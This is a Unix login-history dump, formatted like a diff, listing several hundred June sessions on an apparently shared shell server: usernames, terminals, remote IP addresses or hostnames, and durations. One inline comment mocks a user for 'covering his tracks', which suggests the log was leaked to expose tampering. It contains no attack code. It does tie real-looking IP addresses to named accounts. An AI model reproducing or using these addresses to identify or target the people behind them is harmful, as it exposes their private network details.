+katsst           ttyp2    adsl-76-240-177- Tue Jun 23 18:13 - 18:33  (00:20)
+katsst           ttyp2    adsl-76-240-177- Tue Jun 23 17:13 - 17:43  (00:30)
+pimpinjg         ttypf    cpe-76-175-20-18 Tue Jun 23 08:51 - 08:51  (00:00)
+pimpinjg         ttypd    cpe-76-175-20-18 Tue Jun 23 08:47   still logged in
+pimpinjg         ttypf    cpe-76-175-20-18 Tue Jun 23 08:37 - 08:42  (00:05)
+pimpinjg         ttypd    cpe-76-175-20-18 Tue Jun 23 08:37 - 08:43  (00:06)
+pimpinjg         ttypd    cpe-76-175-20-18 Tue Jun 23 08:36 - 08:36  (00:00)
+pimpinjg         ttypd    cpe-76-175-20-18 Tue Jun 23 08:36 - 08:36  (00:00)
+pimpinjg         ttypf    cpe-76-175-20-18 Tue Jun 23 07:19 - 08:32  (01:12)
+pimpinjg         ttypd    cpe-76-175-20-18 Tue Jun 23 07:15 - 08:36  (01:20)
+pimpinjg         ttypd    cpe-76-175-20-18 Tue Jun 23 07:12 - 07:13  (00:01)
+pimpinjg         ttypd    cpe-76-175-20-18 Tue Jun 23 07:11 - 07:12  (00:00)
+pimpinjg         ttypf    cpe-76-175-20-18 Tue Jun 23 05:20 - 05:20  (00:00)
+pimpinjg         ttypd    cpe-76-175-20-18 Tue Jun 23 04:59 - 07:10  (02:10)
+pimpinjg         ttypd    cpe-76-175-20-18 Tue Jun 23 03:43 - 04:25  (00:42)
+pimpinjg         ttypd    cpe-76-175-20-18 Tue Jun 23 03:10 - 03:10  (00:00)
+pimpinjg         ttypd    cpe-76-175-20-18 Tue Jun 23 02:52 - 02:59  (00:07)
+pimpinjg         ttypd    cpe-76-175-20-18 Tue Jun 23 02:37 - 02:38  (00:01)
+pimpinjg         ttypf    cpe-76-175-20-18 Tue Jun 23 01:26 - 01:28  (00:01)
+pimpinjg         ttypf    cpe-76-175-20-18 Tue Jun 23 01:16 - 01:17  (00:01)
+pimpinjg         ttypd    cpe-76-175-20-18 Tue Jun 23 01:15 - 01:43  (00:28)
+pimpinjg         ttypf    cpe-76-175-20-18 Tue Jun 23 01:11 - 01:14  (00:02)
+pimpinjg         ttypf    cpe-76-175-20-18 Tue Jun 23 01:02 - 01:07  (00:04)
+pimpinjg         ttypd    cpe-76-175-20-18 Tue Jun 23 00:45 - 01:14  (00:28)
+alexbb           ttypd    53551eb9.cable.c Tue Jun 23 00:29 - 00:29  (00:00)
+katsst           ttypf    cpe-75-84-149-5. Mon Jun 22 23:35 - 00:05  (00:30)
+katsst           ttypd    cpe-75-84-149-5. Mon Jun 22 23:15 - 23:35  (00:19)
+pimpinjg         ttypd    cpe-76-175-20-18 Mon Jun 22 21:14 - 22:05  (00:50)
+pimpinjg         ttypd    cpe-76-175-20-18 Mon Jun 22 21:07 - 21:14  (00:07)
+pimpinjg         ttypd    cpe-76-175-20-18 Mon Jun 22 19:23 - 19:54  (00:31)
+pimpinjg         ttypd    cpe-76-175-20-18 Mon Jun 22 18:36 - 18:36  (00:00)
+blkgraz          ttypf    cpe-66-25-54-163 Mon Jun 22 17:41 - 23:35  (05:53)
+pimpinjg         ttypd    cpe-76-175-20-18 Mon Jun 22 17:40 - 18:24  (00:43)
+pimpinjg         ttypd    cpe-76-175-20-18 Mon Jun 22 17:12 - 17:37  (00:24)
+pimpinjg         ttypd    cpe-76-175-20-18 Mon Jun 22 09:20 - 09:21  (00:01)
+pimpinjg         ttype    cpe-76-175-20-18 Mon Jun 22 08:45 - 09:19  (00:33)
+pimpinjg         ttype    cpe-76-175-20-18 Mon Jun 22 08:37 - 08:40  (00:02)
+pimpinjg         ttypd    cpe-76-175-20-18 Mon Jun 22 08:30 - 08:49  (00:19)
+pimpinjg         ttypd    cpe-76-175-20-18 Mon Jun 22 08:20 - 08:26  (00:05)
+pimpinjg         ttypd    cpe-76-175-20-18 Mon Jun 22 08:17 - 08:18  (00:01)
+pimpinjg         ttype    cpe-76-175-20-18 Mon Jun 22 08:03 - 08:12  (00:08)
+pimpinjg         ttypd    cpe-76-175-20-18 Mon Jun 22 08:01 - 08:03  (00:02)
+pimpinjg         ttypd    cpe-76-175-20-18 Mon Jun 22 07:55 - 08:00  (00:04)
+pimpinjg         ttypd    cpe-76-175-20-18 Mon Jun 22 07:43 - 07:55  (00:11)
+pimpinjg         ttypd    cpe-76-175-20-18 Mon Jun 22 04:09 - 04:12  (00:03)
+pimpinjg         ttypf    cpe-76-175-20-18 Mon Jun 22 03:05 - 03:06  (00:00)
+katsst           ttypd    cpe-75-84-149-5. Mon Jun 22 02:44 - 03:14  (00:30)
+pimpinjg         ttypd    cpe-76-175-20-18 Mon Jun 22 02:31 - 02:33  (00:01)
+katsst           ttypg    cpe-75-84-149-5. Mon Jun 22 00:20 - 00:50  (00:30)
+hts              ttypf    pool-71-114-161- Mon Jun 22 00:15 - 00:49  (00:33)
+smash            ttypd    c-98-232-250-179 Sun Jun 21 22:54 - 01:28  (02:34)
+chaos1           ttypd    c-69-143-254-180 Sun Jun 21 22:06 - 22:09  (00:03)
+pimpinjg         ttypd    cpe-76-175-20-18 Sun Jun 21 20:58 - 21:48  (00:50)
+pimpinjg         ttypd    cpe-76-175-20-18 Sun Jun 21 20:35 - 20:51  (00:16)
+pimpinjg         ttypd    cpe-76-175-20-18 Sun Jun 21 20:07 - 20:23  (00:16)
+pimpinjg         ttypd    cpe-76-175-20-18 Sun Jun 21 19:51 - 19:53  (00:01)
+pimpinjg         ttypd    cpe-76-175-20-18 Sun Jun 21 17:22 - 17:25  (00:03)
+pimpinjg         ttypd    cpe-76-175-20-18 Sun Jun 21 17:02 - 17:08  (00:06)
+apo              ttypd    d75-152-200-195. Sun Jun 21 15:03 - 15:26  (00:22)
+apo              ttypd    d75-152-200-195. Sun Jun 21 15:03 - 15:03  (00:00)
+kokoryu          ftp      82-45-111-232.c  Sun Jun 21 13:43 - 13:54  (00:10)
+cazz1961         ttypd    5ad95c74.bb.sky. Sun Jun 21 06:09 - 06:40  (00:30)
+ste              ttype    doc-24-32-94-198 Sat Jun 20 20:50 - 21:21  (00:30)
+matt             ttypd    71.81.144.135    Sat Jun 20 19:27 - 20:00  (00:32)
+matt             ftp      71.81.144.135    Sat Jun 20 19:24 - 19:30  (00:06)
+matt             ttypd    71.81.144.135    Sat Jun 20 18:09 - 18:46  (00:36)
+matt             ftp      71.81.144.135    Sat Jun 20 17:19 - 17:24  (00:05)
+matt             ttypd    71.81.144.135    Sat Jun 20 17:06 - 17:56  (00:50)
+matt             ftp      71.81.144.135    Sat Jun 20 17:04 - 17:09  (00:05)
+matt             ftp      71.81.144.135    Sat Jun 20 16:56 - 17:02  (00:05)
+yaquis           ttypd    ip72-223-92-235. Sat Jun 20 16:35 - 17:05  (00:30)
+pimpinjg         ttypd    cpe-76-175-20-18 Sat Jun 20 15:18 - 15:29  (00:10)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 14:22 - 14:23  (00:01)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 14:17 - 14:22  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 14:12 - 14:16  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 14:06 - 14:11  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 14:01 - 14:06  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 13:56 - 14:01  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 13:51 - 13:56  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 13:46 - 13:50  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 13:40 - 13:45  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 13:35 - 13:40  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 13:30 - 13:35  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 13:25 - 13:30  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 13:20 - 13:25  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 13:15 - 13:19  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 13:09 - 13:14  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 13:04 - 13:09  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 12:59 - 13:04  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 12:54 - 12:59  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 12:49 - 12:54  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 12:44 - 12:48  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 12:38 - 12:43  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 12:33 - 12:38  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 12:28 - 12:33  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 12:23 - 12:28  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 12:18 - 12:23  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 12:13 - 12:17  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 12:07 - 12:12  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 12:02 - 12:07  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 11:57 - 12:02  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 11:52 - 11:57  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 11:47 - 11:51  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 11:41 - 11:46  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 11:36 - 11:41  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 11:31 - 11:36  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 11:26 - 11:31  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 11:21 - 11:26  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 11:16 - 11:20  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 11:10 - 11:15  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 11:05 - 11:10  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 11:00 - 11:05  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 10:55 - 11:00  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 10:50 - 10:55  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 10:45 - 10:49  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 10:39 - 10:44  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 10:34 - 10:39  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 10:29 - 10:34  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 10:24 - 10:29  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 10:19 - 10:24  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 10:14 - 10:18  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 10:08 - 10:13  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 10:03 - 10:08  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 09:58 - 10:03  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 09:53 - 09:58  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 09:48 - 09:53  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 09:43 - 09:47  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 09:37 - 09:42  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 09:32 - 09:37  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 09:27 - 09:32  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 09:22 - 09:27  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 09:17 - 09:22  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 09:12 - 09:16  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 09:06 - 09:11  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 09:01 - 09:06  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 08:56 - 09:01  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 08:51 - 08:56  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 08:46 - 08:51  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 08:41 - 08:45  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 08:35 - 08:40  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 08:30 - 08:35  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 08:25 - 08:30  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 08:20 - 08:25  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 08:15 - 08:20  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 08:10 - 08:14  (00:04)
+brosco           ftp      99-19-91-167.li  Sat Jun 20 08:02 - 08:09  (00:07)
+omgwtf           ttypd    24-216-119-13.dh Sat Jun 20 04:49 - 04:55  (00:05)
+pimpinjg         ttypd    cpe-76-175-20-18 Sat Jun 20 02:13 - 02:14  (00:00)
+kruapra          ttypd    75.80.56.213     Sat Jun 20 01:08 - 01:38  (00:30)
+yaquis           ttypd    186.136.137.30   Fri Jun 19 23:51 - 23:57  (00:05)
+yaquis           ttypd    ip72-223-92-235. Fri Jun 19 22:17 - 22:48  (00:30)
+pimpinjg         ttypd    76.175.20.182    Fri Jun 19 20:41 - 20:43  (00:01)
+psycoz           ttypd    xdsl-213-196-228 Fri Jun 19 18:53 - 19:10  (00:16)
+psycoz           ttypd    xdsl-213-196-228 Fri Jun 19 18:50 - 18:50  (00:00)
+yaquis           ttypd    186.136.137.30   Fri Jun 19 18:24 - 18:27  (00:02)
+matt             ftp      75-130-211-104.  Fri Jun 19 17:13 - 17:23  (00:09)
+matt             ftp      75-130-211-104.  Fri Jun 19 16:57 - 17:02  (00:05)
+matt             ttypd    75-130-211-104.d Fri Jun 19 16:56 - 17:12  (00:16)
+matt             ftp      75-130-211-104.  Fri Jun 19 15:49 - 15:50  (00:00)
+matt             ttypd    75-130-211-104.d Fri Jun 19 15:44 - 15:50  (00:05)
+matt             ftp      75-130-211-104.  Fri Jun 19 15:43 - 15:49  (00:05)
+matt             ftp      75-130-211-104.  Fri Jun 19 15:18 - 15:36  (00:18)
+matt             ftp      75-130-211-104.  Fri Jun 19 15:10 - 15:16  (00:06)
+matt             ftp      75-130-211-104.  Fri Jun 19 15:02 - 15:08  (00:05)
+matt             ftp      75-130-211-104.  Fri Jun 19 14:55 - 15:00  (00:05)
+matt             ttypd    75-130-211-104.d Fri Jun 19 14:48 - 15:36  (00:47)
+matt             ftp      75-130-211-104.  Fri Jun 19 14:46 - 14:53  (00:06)
+matt             ttypd    75-130-211-104.d Fri Jun 19 14:33 - 14:46  (00:12)
+matt             ftp      75-130-211-104.  Fri Jun 19 14:29 - 14:40  (00:10)
+matt             ttypd    75-130-211-104.d Fri Jun 19 14:18 - 14:33  (00:14)
+matt             ftp      75-130-211-104.  Fri Jun 19 14:17 - 14:25  (00:07)
+matt             ftp      75-130-211-104.  Fri Jun 19 14:14 - 14:15  (00:01)
+matt             ftp      75-130-211-104.  Fri Jun 19 14:06 - 14:11  (00:05)
+pimpinjg         ttypf    cpe-76-175-20-18 Thu Jun 18 22:53 - 22:57  (00:04)
+smash            ttypd    ntora.eml.ee     Thu Jun 18 20:44 - 21:12  (00:28)
+yaquis           ttypd    186.136.137.30   Thu Jun 18 18:21 - 18:29  (00:08)
+chaos1           ttypf    94-195-18-213.zo Thu Jun 18 16:34 - 16:41  (00:07)
+cpu              ttype    63-253-113-213.i Thu Jun 18 15:55 - 18:16  (02:21)
+cpu              ttypd    63-253-113-213.i Thu Jun 18 14:00 - 18:03  (04:03)
+pimpinjg         ttyp2    cpe-76-175-20-18 Thu Jun 18 05:11 - 05:12  (00:01)
+pimpinjg         ttyp2    cpe-76-175-20-18 Thu Jun 18 04:53 - 05:07  (00:14)
+pimpinjg         ttyp2    cpe-76-175-20-18 Thu Jun 18 04:42 - 04:42  (00:00)
+pimpinjg         ttypd    cpe-76-175-20-18 Thu Jun 18 04:28 - 04:41  (00:12)
+pimpinjg         ttypd    cpe-76-175-20-18 Thu Jun 18 02:03 - 02:44  (00:41)
+pimpinjg         ttypd    cpe-76-175-20-18 Wed Jun 17 21:10 - 21:52  (00:42)
+pimpinjg         ttype    cpe-76-175-20-18 Wed Jun 17 19:37 - 19:37  (00:00)
+pimpinjg         ttype    cpe-76-175-20-18 Wed Jun 17 19:30 - 19:37  (00:06)
+pimpinjg         ttype    cpe-76-175-20-18 Wed Jun 17 19:29 - 19:30  (00:00)
+pimpinjg         ttype    cpe-76-175-20-18 Wed Jun 17 19:27 - 19:29  (00:01)
+pimpinjg         ttype    cpe-76-175-20-18 Wed Jun 17 19:27 - 19:27  (00:00)
+pimpinjg         ttype    cpe-76-175-20-18 Wed Jun 17 19:25 - 19:26  (00:00)
+pimpinjg         ttype    cpe-76-175-20-18 Wed Jun 17 19:23 - 19:25  (00:01) 
+romeo            ttypg    188.49.118.210   Wed Jun 17 18:35 - 18:35  (00:00) // RoMeO covering his tracks, once again.. lulz
+cpu              ttype    63-253-113-213.i Wed Jun 17 17:50 - 17:54  (00:04)
+cpu              ttypd    63-253-113-213.i Wed Jun 17 17:33 - 19:56  (02:22)
+cpu              ttypd    63-253-113-213.i Wed Jun 17 17:23 - 17:27  (00:04)
+katsst           ttypd    adsl-76-240-177- Wed Jun 17 12:39 - 13:09  (00:30)
+yaquis           ttyp2    ip72-223-92-235. Wed Jun 17 01:49 - 01:54  (00:05)
+katsst           ttyp2    adsl-76-240-177- Tue Jun 16 19:46 - 20:16  (00:30)
+katsst           ttyp2    adsl-76-240-177- Tue Jun 16 19:33 - 19:46  (00:13)
+katsst           ttyp2    adsl-76-240-177- Tue Jun 16 19:24 - 19:33  (00:08)
+katsst           ttyp2    adsl-76-240-177- Tue Jun 16 19:16 - 19:24  (00:07)
+katsst           ttyp2    adsl-76-240-177- Tue Jun 16 19:08 - 19:16  (00:08)
+katsst           ttyp9    adsl-76-240-177- Tue Jun 16 19:01 - 19:08  (00:07)
+katsst           ttyp9    adsl-76-240-177- Tue Jun 16 18:44 - 19:01  (00:16)
+katsst           ttyp9    adsl-76-240-177- Tue Jun 16 18:37 - 18:44  (00:06)
+yaquis           ttypd    ip72-223-92-235. Tue Jun 16 18:12 - 18:20  (00:07)
+katsst           ttyp9    adsl-76-240-177- Tue Jun 16 18:02 - 18:32  (00:30)
+katsst           ttyp2    adsl-76-240-177- Tue Jun 16 13:47 - 14:17  (00:30)
+matt             ttyp2    71-91-220-184.dh Tue Jun 16 10:58 - 11:40  (00:42)
+devil            ttyp2    190.42.73.135    Tue Jun 16 10:18 - 10:18  (00:00)
+katsst           ttyp9    cpe-75-84-149-5. Tue Jun 16 00:10 - 00:40  (00:30)
+katsst           ttyp2    cpe-75-84-149-5. Tue Jun 16 00:08 - 00:38  (00:30)
+katsst           ttyp2    cpe-75-84-149-5. Mon Jun 15 22:45 - 23:15  (00:30)
+matt             ttyp2    71-91-220-184.dh Mon Jun 15 22:05 - 22:19  (00:14)
+kruapra          ttyp2    75.80.56.213     Mon Jun 15 21:13 - 21:43  (00:30)
+yaquis           ttyp9    189.176.226.15   Mon Jun 15 15:57 - 15:57  (00:00)
+matt             ttyp2    71-91-220-184.dh Mon Jun 15 15:52 - 16:18  (00:26)
+chaos1           ttyp2    94-195-18-213.zo Mon Jun 15 13:53 - 14:26  (00:33)
+crrj13           ttyp2    c-24-23-247-110. Mon Jun 15 13:01 - 13:01  (00:00)
+crrj13           ttypd    h-67-103-110-220 Mon Jun 15 12:48 - 12:53  (00:05)
+katsst           ttyp9    cpe-75-84-149-5. Mon Jun 15 12:31 - 13:01  (00:30)
+ste              ttyp2    doc-24-32-94-198 Mon Jun 15 12:22 - 12:59  (00:37)
+katsst           ttyp6    cpe-75-84-149-5. Mon Jun 15 05:43 - 06:13  (00:30)
+alexbb           ttyp6    53551eb9.cable.c Sun Jun 14 22:36 - 22:41  (00:05)
+katsst           ttyp2    cpe-75-84-149-5. Sun Jun 14 22:20 - 22:50  (00:30)
+katsst           ttyp9    cpe-75-84-149-5. Sun Jun 14 16:11 - 16:41  (00:30)
+katsst           ttyp8    cpe-75-84-149-5. Sun Jun 14 16:11 - 16:41  (00:30)
+kruapra          ttyp6    75.80.56.213     Sun Jun 14 13:17 - 13:19  (00:02)
+katsst           ttyp2    cpe-75-84-149-5. Sun Jun 14 10:44 - 16:13  (05:29)
+katsst           ttyp6    cpe-75-84-149-5. Sun Jun 14 09:48 - 10:18  (00:30)
+katsst           ttyp2    cpe-75-84-149-5. Sun Jun 14 07:42 - 08:12  (00:30)
+katsst           ttyp2    cpe-75-84-149-5. Sun Jun 14 00:29 - 00:59  (00:30)
+poolboy          ttyp2    pool-173-77-179- Sat Jun 13 22:47 - 23:21  (00:33)
+matt             ttyp8    71.81.151.8      Sat Jun 13 21:01 - 22:39  (01:37)
+yaquis           ttyp6    ip72-223-92-235. Sat Jun 13 20:54 - 21:35  (00:41)
+katsst           ttyp2    cpe-75-84-149-5. Sat Jun 13 20:37 - 21:07  (00:30)
+katsst           ttyp2    adsl-76-240-177- Sat Jun 13 17:26 - 17:56  (00:30)
+kruapra          ttyp2    75.80.56.213     Sat Jun 13 15:57 - 16:04  (00:06)
+kruapra          ttyp2    75.80.56.213     Sat Jun 13 15:19 - 15:43  (00:24)
+katsst           ttyp2    adsl-76-240-177- Sat Jun 13 13:01 - 13:31  (00:30)
+katsst           ttyp2    cpe-75-84-149-5. Sat Jun 13 11:49 - 12:19  (00:30)
+katsst           ttyp6    cpe-75-84-149-5. Sat Jun 13 09:15 - 09:45  (00:30)
+matt             ttyp2    71-14-179-247.dh Fri Jun 12 23:23 - 00:56  (01:33)
+lyhne1           ttyp2    74-44-57-79.dr01 Fri Jun 12 21:25 - 21:37  (00:11)
+katsst           ttyp2    adsl-76-240-177- Fri Jun 12 15:01 - 15:05  (00:03)
+katsst           ttyp2    adsl-76-240-177- Fri Jun 12 14:55 - 15:01  (00:06)
+katsst           ttyp2    adsl-76-240-177- Fri Jun 12 14:47 - 14:54  (00:06)
+katsst           ttyp2    adsl-76-240-177- Fri Jun 12 14:39 - 14:47  (00:07)
+katsst           ttyp6    adsl-76-240-177- Fri Jun 12 14:34 - 14:39  (00:04)
+katsst           ttyp2    adsl-76-240-177- Fri Jun 12 14:32 - 14:36  (00:03)
+katsst           ttyp2    adsl-76-240-177- Fri Jun 12 14:31 - 14:32  (00:01)
+katsst           ttyp2    adsl-76-240-177- Fri Jun 12 14:20 - 14:31  (00:10)
+katsst           ttyp2    adsl-76-240-177- Fri Jun 12 14:14 - 14:19  (00:05)
+katsst           ttyp2    adsl-76-240-177- Fri Jun 12 14:11 - 14:14  (00:03)
+katsst           ttyp2    adsl-76-240-177- Fri Jun 12 14:01 - 14:10  (00:09)
+katsst           ttyp2    adsl-76-240-177- Fri Jun 12 13:52 - 14:01  (00:08)
+katsst           ttyp2    adsl-76-240-177- Fri Jun 12 13:49 - 13:52  (00:03)
+yaquis           ttyp6    189.172.83.139   Fri Jun 12 13:31 - 13:36  (00:05)
+katsst           ttyp2    adsl-76-240-177- Fri Jun 12 13:26 - 13:49  (00:23)
+matt             ttyp2    71.81.144.125    Fri Jun 12 11:56 - 12:16  (00:20)
+matt             ttyp2    71-91-221-246.dh Thu Jun 11 22:15 - 03:21  (05:05)
+matt             ttyp2    71-91-221-246.dh Thu Jun 11 20:58 - 21:02  (00:03)
+yaquis           ttyp2    ip72-223-92-235. Thu Jun 11 20:24 - 20:55  (00:31)
+kruapra          ttyp2    75.80.56.213     Thu Jun 11 19:49 - 20:19  (00:30)
+smash            ttyp6    88.196.163.223   Thu Jun 11 17:10 - 18:03  (00:53)
+yaquis           ttyp2    189.176.224.156  Thu Jun 11 16:20 - 16:24  (00:04)
+yaquis           ttyp2    189.176.224.156  Thu Jun 11 16:11 - 16:16  (00:05)
+yaquis           ttyp6    189.176.224.156  Thu Jun 11 14:31 - 14:32  (00:01)
+hts              ttyp2    pool-71-114-161- Thu Jun 11 10:54 - 10:56  (00:01)
+sysc             ttyp6    66.197.170.181   Thu Jun 11 07:33 - 07:52  (00:19)
+sysc             ttyp6    66.197.170.181   Thu Jun 11 07:13 - 07:26  (00:13)
+blkgraz          ttyp2    71.252.210.34    Thu Jun 11 06:15 - 10:54  (04:39)
+sysc             ttyp2    218.236.90.157   Thu Jun 11 05:38 - 05:43  (00:04)
+alexbb           ttyp2    83.85.30.185     Thu Jun 11 04:46 - 04:49  (00:03)
+blkgraz          ttyp2    71.252.210.34    Thu Jun 11 04:00 - 04:46  (00:45)
+ioplex           ttyp2    66.229.254.200   Wed Jun 10 22:30 - 22:44  (00:14)
+ioplex           ttyp2    66.229.254.200   Wed Jun 10 22:00 - 22:30  (00:30)
+ioplex           ttyp2    66.229.254.200   Wed Jun 10 21:29 - 21:59  (00:30)
+ioplex           ttyp2    66.229.254.200   Wed Jun 10 20:59 - 21:29  (00:30)
+matt             ttyp6    75.130.209.152   Wed Jun 10 20:54 - 00:28  (03:33)
+ioplex           ttyp2    66.229.254.200   Wed Jun 10 20:29 - 20:59  (00:30)
+bollox           ttyp2    81.129.70.166    Wed Jun 10 16:42 - 17:01  (00:18)
+qfx              ttyp2    62.194.154.102   Wed Jun 10 14:29 - 15:38  (01:08)
+blkgraz          ttyp6    71.252.210.34    Wed Jun 10 03:38 - 20:54  (17:16)
+hts              ttyp6    71.114.161.104   Wed Jun 10 00:28 - 00:29  (00:00)
+sqd              ftp      121.210.177.215  Tue Jun  9 19:46 - 19:51  (00:05)
+crrj13           ttyp6    71.202.99.66     Tue Jun  9 16:50 - 16:51  (00:00)
+katsst           ttyp6    76.240.177.107   Tue Jun  9 14:55 - 15:25  (00:30)
+matt             ttyp2    71.81.151.141    Tue Jun  9 14:27 - 04:04  (13:36)
+redrum           ttyp2    iani.de          Tue Jun  9 13:36 - 13:38  (00:02)
+katsst           ttyp8    76.240.177.107   Tue Jun  9 13:34 - 14:04  (00:30)
+redrum           ttyp2    iani.de          Tue Jun  9 13:33 - 13:35  (00:01)
+katsst           ttyp2    76.240.177.107   Tue Jun  9 13:01 - 13:31  (00:30)
+chaos1           ttyp6    69.143.254.180   Tue Jun  9 12:53 - 13:36  (00:42)
+redrum           ttyp2    iani.de          Tue Jun  9 12:48 - 13:01  (00:12)
+qfx              ttyp2    62.194.154.102   Tue Jun  9 11:06 - 11:37  (00:31)
+psycoz           ttyp2    81.173.252.237   Tue Jun  9 05:28 - 05:34  (00:06)
+alexbb           ttyp6    83.85.30.185     Mon Jun  8 23:26 - 03:39  (04:13)
+yaquis           ttyp6    72.223.92.235    Mon Jun  8 22:37 - 22:57  (00:20)
+matt             ttyp6    75.130.211.22    Mon Jun  8 20:46 - 21:03  (00:16)
+blkgraz          ttyp8    71.252.210.34    Mon Jun  8 20:13 - 13:34  (17:21)
+ste              ttyp6    69.29.159.182    Mon Jun  8 19:10 - 20:46  (01:36)
+matt             ttyp2    75.130.211.22    Mon Jun  8 17:20 - 00:57  (07:37)
+matt             ttyp6    75.130.211.22    Mon Jun  8 16:28 - 17:15  (00:46)
+matt             ttyp2    75.130.211.22    Mon Jun  8 13:29 - 16:30  (03:01)
+matt             ttyp2    75.130.211.22    Mon Jun  8 13:12 - 13:28  (00:16)
+alexbb           ttyp8    83.85.30.185     Mon Jun  8 11:26 - 12:18  (00:52)
+matt             ttyp6    75.130.211.22    Mon Jun  8 11:24 - 11:32  (00:08)
+matt             ttyp2    75.130.211.22    Mon Jun  8 11:21 - 11:51  (00:30)
+chaos1           ttyp2    69.143.254.180   Mon Jun  8 06:25 - 06:29  (00:03)
+alexbb           ttyp6    83.85.30.185     Sun Jun  7 21:59 - 22:31  (00:31)
+chaos1           ttyp6    69.143.254.180   Sun Jun  7 21:09 - 21:11  (00:01)
+yaquis           ttyp6    72.223.92.235    Sun Jun  7 19:05 - 19:28  (00:22)
+matt             ttyp2    71.81.144.135    Sun Jun  7 18:25 - 00:49  (06:23)
+matt             ttyp2    71.81.144.135    Sun Jun  7 18:02 - 18:25  (00:23)
+yaquis           ttyp2    72.223.92.235    Sun Jun  7 17:25 - 17:56  (00:31)
+psycoz           ttyp2    84.44.225.41     Sun Jun  7 17:01 - 17:13  (00:11)
+psycoz           ttyp2    84.44.225.41     Sun Jun  7 16:51 - 17:01  (00:10)
+alexbb           ftp      53551EB9.cable.  Sun Jun  7 15:40 - 15:40  (00:00)
+alexbb           ttyp2    83.85.30.185     Sun Jun  7 15:30 - 15:42  (00:12)
+sysc             ttyp2    24.183.103.36    Sun Jun  7 12:18 - 12:59  (00:41)
+yaquis           ttyp2    72.223.92.235    Sun Jun  7 01:52 - 02:28  (00:35)
+kruapra          ttyp2    75.80.56.213     Sat Jun  6 21:29 - 21:59  (00:30)
+cazz1961         ttyp2    81.159.148.247   Sat Jun  6 19:03 - 19:40  (00:36)
+cazz1961         ttyp6    90.205.23.22     Sat Jun  6 18:37 - 19:07  (00:30)
+katsst           ttyp2    76.240.177.107   Sat Jun  6 18:24 - 18:54  (00:30)
+katsst           ttyp2    76.240.177.107   Sat Jun  6 16:18 - 16:48  (00:30)
